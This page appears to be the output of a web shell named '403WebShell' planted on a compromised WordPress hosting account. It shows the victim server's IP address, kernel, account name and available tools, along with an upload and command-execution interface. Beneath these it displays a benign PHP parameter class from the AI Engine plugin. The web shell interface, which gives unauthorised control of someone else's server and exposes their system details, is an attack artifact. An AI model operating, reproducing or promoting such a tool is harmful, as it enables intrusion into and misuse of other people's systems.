Done ! 403WebShell
403Webshell
Server IP : 46.105.57.169  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : verseaumee ( 152031)
PHP Version : 8.5.7
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/verseaumee/blueversionx/wp-content/plugins/ai-engine/classes/query/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/verseaumee/blueversionx/wp-content/plugins/ai-engine/classes/query/parameter.php
<?php

class Meow_MWAI_Query_Parameter {
  public string $name;
  public ?string $description;
  public ?string $type;
  public ?bool $required;
  public ?string $default;

  public function __construct(
    string $name,
    ?string $description,
    ?string $type = 'string',
    ?bool $required = false,
    ?string $default = null
  ) {

    // Make sure the name is valid for JSON Schema
    if ( !preg_match( '/^\$?[a-zA-Z0-9_]{1,64}$/', $name ) ) {
      Meow_MWAI_Logging::error( "AI Engine: Invalid parameter name ($name) for Meow_MWAI_Query_Parameter." );
    }
    if ( !in_array( $type, [ 'string', 'number', 'integer', 'boolean', 'array', 'object' ] ) ) {
      Meow_MWAI_Logging::error( "AI Engine: Invalid parameter type ($type) for Meow_MWAI_Query_Parameter." );
    }

    $this->name = $name;
    $this->description = empty( $description ) ? '' : $description;
    $this->type = empty( $type ) ? 'string' : $type;
    $this->required = empty( $required ) ? false : $required;
    $this->default = $default;
  }
}

Youez - 2016 - github.com/yon3zu
LinuXploit